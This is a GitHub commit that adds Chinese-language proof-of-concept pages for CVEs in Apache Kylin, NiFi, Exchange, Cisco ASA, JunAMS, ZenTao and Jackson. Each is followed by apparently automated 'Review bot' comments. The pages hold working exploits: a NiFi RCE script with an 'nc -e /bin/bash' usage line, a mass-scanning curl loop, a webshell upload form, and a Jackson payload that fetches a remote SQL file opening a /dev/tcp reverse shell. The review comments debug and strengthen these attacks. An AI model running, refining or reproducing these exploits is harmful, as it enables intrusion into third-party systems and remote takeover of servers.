

Add files via upload
r0eXpeR authored Jan 15, 2021
1 parent 0dcea3b commit 4633feb
Showing 65 changed files with 4,126 additions and 2 deletions.
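--- a/Apache Kylin API未授权访问漏洞(CVE-2020-13937).md
+++ b/Apache Kylin API未授权访问漏洞(CVE-2020-13937).md
@@ -0,0 +1,14 @@
+# Apache Kylin API未授权访问漏洞(CVE-2020-13937)
+
+
+fofa:title="Kylin"
+
+预警通告:https://help.aliyun.com/noticelist/articleid/1060733129.html
+
+PoC:
+
+```
+http://xx.com/kylin/api/admin/config
+```
+
+![](media/16097311107960/16097311518750.jpg)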
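Review bot: The PoC line `http://xx.com/kylin/api/admin/config` comes with no success criterion, so a reader cannot tell an affected host from a patched one that answers the same URL with a 401 or a redirect to the login page. I would add one sentence under the PoC: "Indicator: an unauthenticated GET that returns HTTP 200 with the Kylin configuration body (rather than 401 or a login redirect) means the instance is affected." The page also gives no affected or fixed version range and the `title="Kylin"` fofa query is broad; take the version range from the linked Aliyun notice rather than leaving it implicit.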
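--- a/Apache NiFi Api 远程代码执行(RCE).md
+++ b/Apache NiFi Api 远程代码执行(RCE).md
@@ -0,0 +1,124 @@
+# Apache NiFi Api 远程代码执行(RCE)
+
+**FOFA:**
+
+"nifi" && title=="NiFi"
+
+![](media/16096813383313/16096813558152.jpg)
+
+
+exp.py:
+
+
+```python
+import sys
+import json
+import requests as req
+
+
+class Exp:
+def __init__(self, url):
+self.url = url
+
+def check_is_vul(self):
+url = self.url + "/nifi-api/access/config"
+try:
+res = req.get(url=url, verify=False)
+data = res.json()
+return not data["config"]["supportsLogin"]
+except Exception as e:
+pass
+return False
+
+def clean_up(self, p_id):
+url = self.url + "/nifi-api/processors/" + p_id + "/run-status"
+data = {'revision': {'clientId': 'x', 'version': 1}, 'state': 'STOPPED'}
+req.put(url=url, data=json.dumps(data), verify=False)
+req.delete(url + "/threads", verify=False)
+
+def exploit(self, cmd):
+g_id = self.fetch_process_group()
+if g_id:
+p_id = self.create_process(g_id)
+if p_id:
+self.run_cmd(p_id=p_id, cmd=cmd)
+self.clean_up(p_id=p_id)
+
+def run_cmd(self, p_id, cmd):
+url = self.url + "/nifi-api/processors/" + p_id
+cmd = cmd.split(" ")
+data = {
+'component': {
+'config': {
+'autoTerminatedRelationships': ['success'],
+'properties': {
+'Command': cmd[0],
+'Command Arguments': " ".join(cmd[1:]),
+},
+'schedulingPeriod': '3600 sec'
+},
+'id': p_id,
+'state': 'RUNNING'
+},
+'revision': {'clientId': 'x', 'version': 1}
+}
+print(data)
+headers = {
+"Content-Type": "application/json",
+}
+res = req.put(url=url, data=json.dumps(data), headers=headers, verify=False)
+return res.json()
+
+def fetch_process_group(self):
+url = self.url + "/nifi-api/process-groups/root"
+try:
+res = req.get(url=url, verify=False)
+data = res.json()["id"]
+return data
+except Exception as e:
+pass
+return 0
+
+def create_process(self, process_group_id):
+url = self.url + "/nifi-api/process-groups/" + process_group_id + "/processors"
+data = {
+'component': {
+'type': 'org.apache.nifi.processors.standard.ExecuteProcess'
+},
+'revision': {
+'version': 0
+}
+}
+headers = {
+"Content-Type": "application/json",
+}
+try:
+res = req.post(url=url, data=json.dumps(data), headers=headers, verify=False)
+return res.json()["id"]
+except Exception as e:
+pass
+return 0
+
+
+if __name__ == '__main__':
+if len(sys.argv) != 3:
+print("rce.py url cmd")
+else:
+url = sys.argv[1] # http://192.168.1.1:8080
+cmd = sys.argv[2] # nc -e /bin/bash 192.168.1.129 1234
+e = Exp(url)
+e.exploit(cmd)
+
+```
+
+msf模块:
+
+https://packetstormsecurity.com/files/160260/apache_nifi_processor_rce.rb.txt
+
+ref:
+
+https://twitter.com/chybeta/status/1333341820596568065
+
+https://github.com/imjdl/Apache-NiFi-Api-RCE
+
+https://forum.ywhack.com/thread-114763-1-3.html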
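Review bot: `exploit` never calls `check_is_vul`, so the script goes straight to creating an `ExecuteProcess` processor on whatever it is pointed at, including instances where `supportsLogin` is true and the unauthenticated POST simply fails; the guard belongs at the top of `exploit`: `if not self.check_is_vul(): return`. The `except Exception: pass` in `check_is_vul`, `fetch_process_group` and `create_process` turns connection errors, auth failures and non-JSON bodies into a silent `False`/`0`, while `run_cmd` has no handler at all and raises on a non-JSON reply — at minimum print `res.status_code` and `res.text` in those branches so a failed run is distinguishable from an unreachable host. In `clean_up` the DELETE reuses the run-status URL and therefore goes to `.../run-status/threads`; that reads like a concatenation slip and should be checked against the processor-level `threads` endpoint before relying on the cleanup. Note also that the listing has lost its indentation in this rendering, so it will not run as pasted from the page.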
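--- a/Bypass for Microsoft Exchange远程代码执行 CVE-2020-16875.md
+++ b/Bypass for Microsoft Exchange远程代码执行 CVE-2020-16875.md
@@ -0,0 +1,83 @@
+# Bypass for Microsoft Exchange远程代码执行 CVE-2020-16875
+
+CVE-2020-16875的补丁代码:
+
+
+```
+internal static void ValidateCmdletParameters(string cmdlet,
+IEnumerable<KeyValuePair<string, string>> requiredParameters)
+{
+if (string.IsNullOrWhiteSpace(cmdlet))
+{
+return;
+}
+Collection<PSParseError> collection2;
+Collection<PSToken> collection = PSParser.Tokenize(cmdlet,
+out collection2);
+if (collection2 != null && collection2.Count > 0)
+{
+throw new DlpPolicyParsingException(
+Strings.DlpPolicyNotSupportedCmdlet(cmdlet));
+}
+if (collection != null)
+{
+// #1 CHECKS IF THERE IS MORE THAN ONE COMMAND, BUT DOES NOT
+// RECOGNIZE .NET FUNCTIONS SUCH AS [Int32]::Parse("12")
+if ((from token in collection
+where token.Type == PSTokenType.Command
+select token).ToList<PSToken>().Count > 1)
+{
+throw new DlpPolicyParsingException(
+Strings.DlpPolicyMultipleCommandsNotSupported(cmdlet));
+}
+}
+bool flag = false;
+foreach (KeyValuePair<string, string> keyValuePair in requiredParameters)
+{
+// #2 CHECKS IF THE cmdlet STRING(!!) STARTS WITH AN ALLOWED KEY
+if (cmdlet.StartsWith(keyValuePair.Key,
+StringComparison.InvariantCultureIgnoreCase))
+{
+// #3 CHECKS IF THE THE VALUES / PARAMETERS MATCH A CERTAIN
+// REGEX
+if (!Regex.IsMatch(cmdlet, keyValuePair.Value,
+RegexOptions.IgnoreCase))
+{
+throw new DlpPolicyParsingException(
+Strings.DlpPolicyMissingRequiredParameter(cmdlet,
+keyValuePair.Value));
+}
+flag = true;
+}
+}
+if (!flag)
+{
+throw new DlpPolicyParsingException(Strings.DlpPolicyNotSupportedCmdlet(
+cmdlet));
+}
+}
+```
+
+**绕过:**
+
+可以轻松绕过检查#2,因为检查是在原始cmdlet字符串,仅使用函数.StartsWith()检查cmdlet的开头。要绕过,我们只提供给定的有效键中包含的命令字符串通过requiredParameters:
+
+```
+new-transportruleSOMETHINGELSE ....
+```
+
+**PoC:**
+
+以下Payload可以绕过所有三个检查:
+
+
+```
+<![CDATA[ new-transportrule
+-Name $([Diagnostics.Process]::start("cmd.exe / C <run-as-SYSTEM>"))
+-DlpPolicy "%%DlpPolicyName%%"
+]]>
+```
+
+详情可以阅读:https://x41-dsec.de/security/advisory/exploit/research/2020/12/21/x41-microsoft-exchange-rce-dlp-bypass/
+
+https://forum.ywhack.com/thread-114854-1-2.html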
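Review bot: In the PoC block the command is written as `cmd.exe / C <run-as-SYSTEM>`; with a space between `/` and `C`, cmd.exe does not see a `/C` switch, so unless that spacing is copied verbatim from the source advisory the placeholder should read `cmd.exe /C <command>`. The section also never states the precondition: the validator shown operates on a cmdlet string that reaches Exchange through DLP policy handling, which in the original CVE-2020-16875 reports is reachable only by an authenticated user with the relevant DLP/compliance role — one sentence confirming that against the linked X41 write-up would stop readers treating this as unauthenticated RCE. Finally, the prose explains how check #2 is defeated by `StartsWith` but not why `$([Diagnostics.Process]::start(...))` survives check #1; the `#1` comment in the listing already says the tokenizer does not count .NET method calls as commands, and the bypass text should point to it.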
42 changes: 42 additions & 0 deletions CISCO ASA任意文件读取漏洞 (CVE-2020-3452).md
@@ -0,0 +1,42 @@
# CISCO ASA任意文件读取漏洞 (CVE-2020-3452)


POC:


```
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
```


```
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: webvpnlogin=1; webvpnLang=en
```

```
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 127.0.0.1
Content-Length: 2
```

从列表中单行检查CVE-2020-3452


```bash
while read DOM; do curl -s -k "https://$DOM/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q Cisco && echo [VULNERABLE] $DOM || echo [NOT VULNERABLE] $DOM; done < $1

```

ref:

https://forum.ywhack.com/thread-1419-1-7.html
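Review bot: The one-liner decides `[VULNERABLE]` on `grep -q Cisco` over the first ten lines of the response, which is a weak indicator: an unpatched ASA returns the contents of `portal_inc.lua`, while a patched or unrelated device can still answer with a branded error page that contains the word Cisco. Match on a string you have confirmed appears only in the leaked Lua source, and bound the request so a dead host does not stall the whole loop: `curl -s -k -m 10 "https://$DOM/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"`, plus `done < "$1"` so a path with spaces works. The two raw requests above end without the blank line that terminates HTTP headers; this section renders 40 of the file's 42 lines, so that is probably a rendering loss, but if the file really lacks them the requests will hang when replayed from a proxy.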
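--- a/CNVD-2020-24741 JunAms内容管理系统文件上传漏洞.md
+++ b/CNVD-2020-24741 JunAms内容管理系统文件上传漏洞.md
@@ -0,0 +1,26 @@
+# CNVD-2020-24741 JunAms内容管理系统文件上传漏洞
+
+
+JunAMS是一款以ThinkPHP为框架的开源内容管理系统。
+
+JunAMS内容管理系统存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。
+
+影响版本:JunAMS junAMS 1.2.1.20190403
+
+EXPLOIT:
+
+
+```html
+<form enctype="multipart/form-data" action="http://localhost//admin.php/common/add_images.html" method="post">
+<input type="file" name="file" size="50"><br>
+<input type="submit" value="Upload">
+</form>
+
+```
+
+via:beautymanor
+
+ref:
+
+https://www.cnvd.org.cn/flaw/show/CNVD-2020-24741
+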
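Review bot: The exploit form posts to `admin.php/common/add_images.html`, a path under the admin front controller, yet the write-up never says whether the upload requires an authenticated back-end session; that decides whether this is pre- or post-auth and should be stated next to the affected version (the CNVD entry linked below is the place to confirm it). The `action` URL also carries a doubled slash (`http://localhost//admin.php/...`), which some routers normalise and others reject — write it as `http://localhost/admin.php/common/add_images.html`. It would also help to say what the server returns on a successful upload, since the stored path in that response is what a reader needs to reach the uploaded file.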
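--- a/CNVD-C-2020-121325 禅道开源版文件上传漏洞.md
+++ b/CNVD-C-2020-121325 禅道开源版文件上传漏洞.md
@@ -0,0 +1,35 @@
+# CNVD-C-2020-121325 禅道开源版文件上传漏洞
+
+
+禅道官网发布了12.4.3版本更新公告,修复了一个文件上传的漏洞。恶意攻击者(需要登陆后台的任意⽤用户)可以通过fopen/fread/fwrite方法结合file、http、ftp等协议,读取或上传任意敏感文件,成功利用漏洞可获得目标系统中敏感文件及系统管理权限。
+
+漏洞编号:
+
+CNVD-C-2020-121325
+
+漏洞等级:高危
+
+受影响的版本:
+
+禅道开源版<=12.4.2
+
+通过版本比对,问题出在module/client/ext/model/xuanxuan.php:14 的 downloadZipPackage 函数中:
+
+![](media/16097310393821/16097310621213.jpg)
+
+
+没有对后缀名进行限制,补丁则进行了白名单处理
+
+所以getshell 的一个方法之一就是直接远程download一个php文件即可shell。
+
+
+![](media/16097310393821/16097310719167.jpg)
+
+
+ref:
+
+https://mp.weixin.qq.com/s/d-dtcUi2yLKsyXfPuyUF8A
+
+https://www.zentao.net/dynamic/zentaopms12.4.3-80272.html
+
+https://s.tencent.com/research/bsafe/1159.html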
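Review bot: The exploitation step exists only in the two screenshots, so the page has no reproducible request: the text names `downloadZipPackage` in `module/client/ext/model/xuanxuan.php` and says the suffix is unchecked, but never gives the controller action, the parameter that carries the remote URL, or where the downloaded file lands on disk. A sentence spelling out that request and the resulting path would let a reader verify it against 12.4.2 and the whitelist added in 12.4.3 without relying on images. The intro already says any logged-in back-end user suffices; repeat that precondition next to the getshell sentence so it is not lost on a skim.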
64 changes: 64 additions & 0 deletions CVE-2019-12384 jackson ssrf-rce(附exp脚本).md
@@ -0,0 +1,64 @@
# CVE-2019-12384 jackson ssrf-rce(附exp脚本)


1、ssrf:


```
POST /fuckme HTTP/1.1
Host: 192.168.136.131:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://192.168.136.129:7777/"}]
```

或者直接使用dnslog验证:


```
poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://jcqfpe.dnslog.cn/"}]
```

2、RCE:

首先在vps上放置一个.sql的文件,内容如下:


```sql
CREATE ALIAS SHELLEXEC AS $ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$;
CALL SHELLEXEC('bash -i >& /dev/tcp/192.168.136.129/7777 0>&1')
```

然后发送payload,请求远程的sql文件,进行RCE


```
POST /fuckme HTTP/1.1
Host: 192.168.136.131:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.136.129/exp.sql'"}]
```

via:Mosen
